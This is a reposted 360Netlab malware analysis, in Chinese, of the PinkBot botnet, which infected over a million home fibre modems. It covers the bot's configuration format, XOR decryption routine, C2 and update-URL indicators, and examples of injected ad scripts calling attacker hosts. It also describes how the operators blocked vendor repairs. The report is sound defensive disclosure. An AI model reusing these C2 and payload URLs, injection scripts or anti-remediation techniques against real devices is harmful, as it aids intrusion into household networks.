最新公告
  • 欢迎您的光临,本站秉承服务宗旨 履行“站长”责任,资源提供永无止境!立即赞助我们
  • 360NETLAB实验室研究文章:一个藏在我们身边的巨型僵尸网络 Pink

    广告!请自辨真伪
    广告!请自辨真伪 广告!请自辨真伪

    本文转载自360NETLAB,据360研究人员透露,名为PinkBot的蠕虫病毒在国内感染约200万台家庭光猫,其中中国联通设备占80%、中国电信设备占15%。在被发现后360与相关方进行合作进行清理,然而攻击者采取技术对抗导致目前全国剩余约10万台光猫变成孤岛,运营商已经失去这些光猫的控制权无法进行任何远程处理,除非人工到用户家里进行调试或直接更换设备。

    本文完成于2020年春节前后,为维护广大最终消费者的利益,一直处于保密期无法发表。近日 CNCERT 公开披露了相关事件,令本文有了公开契机。在保密期的这段时间里,Pink 也出现一些新的小变动,笔者筛选了其中一部分放到“新动向”章节,供其他同仁共同追踪研究。

    原文链接:https://blog.netlab.360.com/pinkbot/

    概述

    2019年11月21日,安全社区的信任伙伴给我们提供了一个全新的僵尸网络样本,相关样本中包含大量以 pink 为首的函数名,所以我们称之为 PinkBot。

    Pinkbot 是我们六年以来观测到最大的僵尸网络,其攻击目标主要是 mips 光猫设备,在360Netlab的独立测量中,总感染量超过160万,其中 96% 位于中国。

    PinkBot 具有很强的技术能力:

    1. PinkBot 架构设计具备很好的健壮性,它能够通过多种方式(通过第三方服务分发配置信息/通过 P2P 方式分发配置信息/通过 CNC 分发配置信息)自发寻址控制端,并对控制端通信有完备的校验,确保僵尸节点不会因某一个环节的阻杀而丢失或被接管;甚至对光猫固件做了多处改动后,还能确保光猫能够正常使用;
    2. PinkBot对部分域名的解析查询采取了 DNS-Over-HTTPS 的方式,这个也是在传统BotNet中不太常见的一种手段;
    3. 在与相关厂商的屡次攻防博弈中,PinkBot 的运营者都占据了明显的对抗优势。

    可以说,PinkBot 在整个过程中表现出了极强的针对性和专业性,各方面能力都很均衡,甚至有些可怕。

    规模及影响范围

    我们通过对多个数据源的交叉对比,推测 PinkBot 的感染量在百万量级。三个评估的数据源如下:

    1. 2019-11-30我们从可信任的安全伙伴手里拿到一个统计数字,日活去重 1,962,308 个IP;
    2. 2020-01-02从CNCERT拿到的统计结果:
      “该僵尸网络的规模目前无法准确测算。根据NetFlow数据、主动探测数据、实时监测数据等多个维度的数据测算,该僵尸网络关联的Bot节点IP地址数量超过500万。对这些IP地址的定位数据进行统计发现,IP主要为联通的家庭宽带用户地址。因家庭宽带IP是动态分配的,背后的真实感染设备规模无法精确估计,推测实际感染设备数量在百万级,测算的一个主要依据为曾监测到1分钟内连接C2的IP数量超过百万。”
    3. 根据我们 (360NetLab) 在全网范围内持续探测的数据评估,2020-01-08 当天活跃的受感染 IP 数量为 165 万。

    在我们全网探测的测量数据中,受感染的 IP 主要集中在中国 (96%),遍及全国 33 个省。受影响的运营商主要涉及中国联通(>80%)和中国电信(>15%)。

    PinkBot 技术架构

    PinkBot是一个同时融合了“P2P”和“CNC”的混合结构僵尸网络。一般情况下,它将时效性要求不高的指令(如管理配置信息)通过P2P的方式传递,将时效性要求较高的指令通过CNC模式集中分发(例如:发起ddos攻击,向用户访问的HTTP网站中插广告)。

    配置信息

    对于每一个Bot来说,最重要的一步是找到自己的管理员。而管理员的信息就包含在“配置”之中,下面是最新截获的配置信息:

    { "verify": "1585065675", "cncip1": "144.202.109.110", "cncport1": "32876", "dlc": "5b62596bc1453d51cc7241086464f294", "dl": "http【:】//155.138.140.245/dlist.txt", "dlc1": "484417e6f65c8e18e684d60c03c4680a", "dl1": "https【:】//*****.com/johncase/zip/raw/master/dlist.txt", "sd0": "1.1.1.1", "sdp0": "443", "srvk": "FJAz37XiKgnTLtVpmhjxZcavTJUU5r4XN3Wl5nhTpg0=", "pxy": "1"
    }
    1. 其中 verify 字段为指令发布的时间戳,Bot会根据这个时间戳筛选出最新的有效指令。
    2. 随后的 cncip 和 cncport 字段指明了僵尸网络的最新CNC地址,攻击者会根据自身需求随时切换这个控制地址。
    3. 再随后的“dlc/dl”和 “dlc1/dl1” 字段组为最新的Bot更新地址,其中dlc和dlc1为对应内容的Hash校验字段,算法伪代码为:MD5(MD5(dlist_content)+SHA256(dlist_content))。
    4. “sd0/sdp0”字段为安全DNS地址,对于每一个Bot来说,当需要查询DNS解析记录时,将通过这里指定的DNS服务来查询。且方式为DNS-Over-HTTPS。
    5. srvk字段为服务端的公钥内容(base64编码)。对于每一个bot来说,它和CNC的通讯都是加密的。所以实际通讯前要先经过ECDH的密钥协商得到一个唯一的私钥。在这里指定了CNC端的公钥后,还可以顺带完成了Bot对CNC身份的验签。这是对原有 ECDH 的扩展使用。
    6. pxy字段,推测是一个代理上线的选项。目前没有看到使用迹象,不清楚具体的工作逻辑。

    配置信息的保护

    通过上一节的介绍,不难发现“配置信息”其实就是这个僵尸网络的核心,它保证了攻击者对僵尸网络的绝对控制能力。
    为了防止其他人发现配置信息,传递的配置信息都是异或加密过的密文。异或加解密算法是对称的,其解密代码逻辑如下:

    def easydecrpyt(message): res = "" for cursor in range(0, len(message)): mbt = ord(message[cursor]) res += (chr((mbt ^ (cursor%0xff) ^ 0xae ^ 0xac ^ 0xbe ^ 0xef) & 0xff)) return res

    信息加密后,为了防止他人伪造。攻击者还使用了ecdsa对配置信息进行了签名,签名细节如下:

    1. 签名校验使用的密码库为 mbedtls;
    2. 签名算法为 ECDSA;
    3. 签名时使用的曲线为:MBEDTLS_ECP_DP_SECP192R1;
    4. 验签所用公钥为: 04 8D 54 71 71 44 A0 61 DA 5A B4 EA 40 55 2F 21 B1 9B 6C A5 17 92 0F 10 B5 11 56 ED 14 DB 54 47 1A 94 48 06 06 3C 7A B4 3B 25 D1 AC 9F 85 AF 33 9E

    配置信息的分发

    除了保证配置信息的机密性和完整性外,攻击者还使用了多种手段来分发配置信息,以确保其可用性。

    a) 通过第三方服务分发配置信息

    1. 通过 BTC+GITHUB 分发配置信息

    该分发渠道的核心是一个隐藏在GITHUB上的项目,比如最近一次看到的项目就是(mypolo111/vfg),可以看到这个项目的README中,有两行内容。

    360NETLAB实验室研究文章:一个藏在我们身边的巨型僵尸网络 Pink除了日常的维护类指令(心跳指令/peerlist同步指令)外,我们还收到了多条向WEB网页插入广告的指令,例如:

    <script async src="http【:】//45.32.21.251/j/?$$"></script>
    <script async src="http【:】//167.179.80.159/j/?$$"></script>
    <script async src=“http【:】//114.55.124.13/j/?$$“></script>

    汇报及处置

    360公司为维护广大最终消费者的利益,做了以下处置工作:

    1. 通报各级监管机构;
    2. 依法配合执法机构行动;
    3. 联合设备供应商进行安全防御;
    4. 在360系列安全浏览器、安全DNS上阻断PinkBot相关控制域名、插播广告域名;
    5. 联合若干互联网基础设施供应商共同监控PinkBot行动。

    新动向

    本文其他部分,均完成于2020年春节前后,到现在已经度过了一年半的时光。在这段时间中,我们没有发现 Pink 出现太大的变动,本节附上了一些最新的线索,供同仁们共同研究和追踪。

    最新传播的配置信息

    随着对 pink 的持续追踪,我们发现,pink 的配置信息会间歇性发生变化,变动内容主要体现在 CNC 字段和 DL* 字段,并于最近几个月趋于稳定。下面是我们在 2021/10/5(北京时间) 捕获的最新配置信息。

    { "verify":"1611936001", "cncip1":"140.82.40.29", "cncport1":"26007", "dlc":"450aa79da035a8a55ca4c0e6b1025b50", "dl":"http://209.250.247.60/dlist.txt", "dlc1":"47ed94977b45099f1ef5c7701b2d25dc", "dl1":"https://****.com/****/dlist.txt", "sd0":"1.1.1.1", "sdp0":"443", "srvk":"FJAz37XiKgnTLtVpmhjxZcavTJUU5r4XN3Wl5nhTpg0=", "pxy":"1"
    }

    当前规模

    我们一直阶段性的对公网上的 Pink 节点进行持续监测,通过对 2021/10/20日的日志分析,我们仍然可以看到 103024 个 IP 处于日活状态。这表明,当前的 pink 的感染规模仍然在 10w 量级左右,涉及多家设备厂商,按照每个IP对应一个三口之家来计算,受影响人群大概 30w 人左右。按照每个光猫 100 元的更换成本计算,当前仍有上千万损失等待弥补。

    曾发起 DDoS 攻击

    文章编写完成时,我们并没有抓到 Pink 发起 ddos 攻击的指令,但在随后的一段时间中,我们监测到了大概100多条试图发起 DDos 攻击的指令,下面筛选其中的两条,供参考:

    2020/3/24 通过UDP协议,攻击 203.56.252.137:26999
    2020/4/8 通过HTTP协议,攻击 180.101.192.199:27020

    番外:Pink 对抗的能力

    在对 Pink 僵尸网络分析跟踪的过程中。我们注意到,攻击者和不同厂商进行过多次的攻防对抗。
    这一章节将简单介绍下在对抗中, Pink 展现出来的一些能力。

    设备厂商的博弈

    根据相关厂商之一提供的信息,对抗最早发生在 2019 年 11 月中旬。受攻击的漏洞源于一个 TCP-17998 的管控服务,该服务是对运营商提供的一个管理家用光猫的接口。由于服务配置和实现的失误,向公网开放了访问权限,攻击者通过它获取了相关光猫的控制权。

    第一次对抗: 厂商在发现这个问题后,开始试图在公网上通过相同的漏洞,修复自家设备。但很快就被攻击者发现并马上采取行动,通过 iptables 关闭了 TCP-17998 的外网访问能力,从设备内部阻止了厂商的进一步修复。

    第二次对抗:此次攻防的焦点在 tr069 升级通道。厂商从运营商侧可以在设备启动瞬间利用 tr096 进去修复设备。然而此次攻击者仍然在第一时间察觉到问题,并迅速更新固件关掉了tr096 的更新通道。

    第三次对抗:厂商又尝试利用设备上 LAN 侧的 TCP-80 HTTP 服务来进行设备修复,然而,同样的结局,攻击者很快又更新固件把设备上的 HTTP 服务文件干掉了。至此,所有的光猫都成了网络孤岛,它们只能提供终端用户的正常网上冲浪的能力,却再没有网络端口可以供外侧管理访问。

    最后的方案:厂商已经完全没有还击的筹码了。如果要修复这些孤岛,只能派人入户接触光猫,拆解出调试接口或者干脆为用户更换光猫。

    复盘总结:设备厂商与攻击者多轮的攻防对抗中,双方的信息和能力是不对等的。厂商在无法获知全网受害情况的前提下,从互联网上一个IP一个IP的发现设备/修复设备。而攻击者通过集中C&C的机制,统一下发关服务指令。虽然,厂商修复了一部分设备得到了局部胜利,但攻击者仍然保住了大部分胜利果实获取了全局胜利。
    另一方面,将物联网设备供应商与成熟的系统供应商在安全能力方面对比(例如Windows、安卓或者MacOS),后者拥有成熟的多的安全人员建制和丰富的多的安全对抗经验。再考虑到物联网设备数量众多,多得多的数量加上少的多的防御,更多的攻击转向物联网设备是老道攻击者的自然选择。

    GITHUB 封相关账号

    我们在实际跟踪中通过残留的早期指令发现,PinkBot 至少已经存在一年以上了,最早可以追溯到 2018年10月16日,当时使用的 github 帐号为 pink78day(这个账号早就已经看不到了,我们通过搜索Google的网页快照服务追溯)。

    pink78day在长期的跟踪中,我们确定至少存在以下URL被用于样本同步。这些URL均提取自 PinkBot 的配置信息中。

    http[:]//1.198.50.63:1088/dlist.txt
    http[:]//1.63.19.10:19010/var/sss/dlist.txt
    http[:]//104.207.142.132/dlist.txt
    http[:]//108.61.158.59/dlist.txt
    http[:]//111.61.248.32:1088/dlist.txt
    http[:]//112.26.43.199:81/dlist.txt
    http[:]//113.106.175.43:19010/tmp/pinkdown/dlist.txt
    http[:]//117.131.10.102:1088/d/dlist.txt
    http[:]//123.13.215.89:8005/d/dlist.txt
    http[:]//125.74.208.220:81/dlist.txt
    http[:]//140.82.24.94/dlist.txt
    http[:]//140.82.30.245/d/dlist.txt
    http[:]//140.82.53.129/dlist.txt
    http[:]//144.202.38.129/dlist.txt
    http[:]//149.28.142.167/p/dlist.txt
    http[:]//149.28.142.167/p1/dlist.txt
    http[:]//155.138.140.245/dlist.txt
    http[:]//167.179.110.44/dlist.txt
    http[:]//173.254.204.124:81/dlist.txt
    http[:]//182.139.215.4:82/dlist.txt
    http[:]//207.148.4.202/dlist.txt
    http[:]//218.25.236.62:1987/d/dlist.txt
    http[:]//218.25.236.62:1988/d/dlist.txt
    http[:]//222.216.226.29:81/dlist.txt
    http[:]//45.32.26.220/dlist.txt
    http[:]//45.76.104.146/dlist.txt
    http[:]//45.77.165.83/p1/dlist.txt
    http[:]//45.77.198.232/p1/dlist.txt
    http[:]//45.88.42.38/p1/dlist.txt
    http[:]//61.149.204.230:81/dlist.txt
    http[:]//66.42.114.73/dlist.txt
    http[:]//66.42.67.148/dlist.txt
    http[:]//8.6.193.191/dlist.txt
    http[:]//95.179.238.22/dlist.txt
    https[:]//***.com/**/dlist.txt
    https[:]//raw.githubusercontent.com/pink78day/helloworld/master/dlist.txt

    MD5

    通过跟踪获取到的相关样本(ELF)汇总如下:

    9ec5bd857b998e60663e88a70480b828 /bin/protect
    451a3cf94191c64b5cd1be1a80be7799 /bin/tr69c
    06d6ad872e97e47e55f5b2777f78c1ba slient_l
    07cd100c7187e9f4c94b54ebc60c0965 slient_b
    0f25b0d54d05e58f5900c61f219341d3 client_b
    0f89e43ea433fdfd18a551f755473388 slient_l
    1197994610b2ffb60edbb5ab0c125bc0 client_b
    167364ad0d623d17332f09dbb23a980e client_b
    175b603082599838d9760b2ab264da6f slient_l
    1a6dce9916b9b6ae50c1457f5f1dfbbd slient_l
    229503686c854bb39efdc84f05b071b9 slient_b
    25a07e3ef483672b4160aa12d67f5201 client_l
    262a4e242c9ebeba79aa018d8b38d229 client_l
    29d0afd2a244c9941976ebf2f0f6597f client_l
    2befedd020748ff6d9470afad41bd28c slient_b
    2ca5810744173889b2440e4f25b39bd4 client_l
    36e48e141943a67c6fdeaa84d7af21cc client_b
    3a620ff356686b461e0e1a12535bea24 slient_l
    41bbe8421c0a78067bae74832c375fe8 slient_l
    45ee78d11db54acfdda27c19e44c3126 client_l
    4830c3950957093dac27d4e87556721e slient_l
    484761f281cb2e64d9db963a463efca5 client_l
    48a7f2799bf452f10f960159f6a405d3 client_l
    494412638dc8d573172c1991200e1399 client_l
    4c83ad66189a7c4d2f2afdbfb94d0e65 slient_b
    50270de8d5783bb0092bf1677b93c97b slient_l
    54aa9e716567bd0159f4751916f7f0d1 client_l
    5ae1fec20c2f720269c2dc94732187e8 slient_b
    5b62a9bd3431c2fd55283380d81c00fa client_b
    5c322610e1845d0be9ccfc8a8b6a4c4f client_l
    5c4f8dae67dad8cac141afa00847b418 slient_b
    5d0d034845bd69179bf678104c046dc1 client_b
    60658ef214c960147200d432eece3e13 slient_l
    60a2b1bb02a60ac49f7cc1b47abdf60c client_l
    610f0aadba3be1467125607bf2ba2aaf slient_l
    66a068fd860bda7950fde8673d1b5511 client_b
    6c4de9bd490841f0a6c68638f7253c65 client_b
    72c531a813b637af3ea56f288d65cdb7 slient_b
    7608b24c8dcf3cd7253dbd5390df8b1f client_b
    7645a30a92863041cf93a7d8a9bfba1a client_b
    857fc3c7630859c20d35d47899b75699 slient_b
    861af6b5a3fea01f2e95c90594c62e9d client_l
    8e86be3be36094e0f5b1a6e954dbe7c2 client_l
    8fbcd7397d451e87c60a0328efe8cd5d client_b
    987a9befb715b6346e7ad0f6ac87201f slient_b
    9eb147e3636a4bb35f0ee1540d639a1b slient_b
    aa2fc46dd94cbf52aef5e66cdd066a40 client_l
    ae8b519504afc52ee3aceef087647d36 slient_b
    b0202f1e8bded9c451c734e3e7f4e5d8 slient_b
    b6f91ad027ded41e2b1f5bea375c4a42 slient_b
    b9935859b3682c5023d9bcb71ee2fece slient_b
    b9d1c31f59c67289928e1bb7710ec0ba client_l
    bec2f560b7c771d7066da0bee5f2e001 client_b
    c2efa35b34f67a932a814fd4636dd7cb slient_l
    c839aff2a2680fb5676f12531fecba3b slient_b
    c94504531159b8614b95c62cca6c50c9 slient_l
    dfe0c9d36062dd3797de403a777577a6 client_b
    e19a1106030e306cc027d56f0827f5ce slient_l
    f09b45daadc872f2ac3cc6c4fe9cff90 client_b
    f5381892ea8bd7f5c5b4556b31fd4b26 client_b
    f55ad7afbe637efdaf03d4f96e432d10 slient_b
    f62d4921e3cb32e229258b4e4790b63a client_b
    f81c8227b964ddc92910890effff179b slient_b
    fc5b55e9c6a9ddef54a256cc6bda3804 client_b
    fe8e830229bda85921877f606d75e96d slient_l
    fee6f8d44275dcd2e4d7c28189c5f5be client_l

    本文来源 蓝点网,由 米铺网 整理编辑,其版权均为 原网址 所有,文章内容系作者个人观点,不代表 米铺网 对观点赞同或支持。如需转载,请注明文章来源。

    常见问题FAQ

    免费下载或者赞助VIP会员专享资源能否直接商用?
    本站所有资源均收集与各大平台,版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 赞助VIP介绍。
    提示下载完但解压或打开不了?
    最常见的情况是下载不完整: 可对比下载完压缩包的与网盘上的容量,若小于网盘提示的容量则是这个原因。这是浏览器下载的bug,建议用百度网盘软件或迅雷下载。若排除这种情况,可在对应资源底部留言,或 联络我们.。
    开通赞助会员或者下载源码 “不完整” 或 “不能用” “版本号不对” 怎么办?
    非常抱歉,资源均收集与网络,你有权利告诉本站,但是本站有选择处理或者不处理的权力,如无法接受请不要购买或开通本站会员。
    开通终身赞助会员能下载全站资源码?
    可以100%下载全站源码资源的,除部分失效资源,失效的可以联系客服尝试恢复。

    发表评论

    • 26951会员总数(位)
    • 24500资源总数(个)
    • 104本周发布(个)
    • 36 今日发布(个)
    • 660稳定运行(天)

    提供最优质的资源集合

    立即查看 了解详情
    赞助SVIP享更多特权立即赞助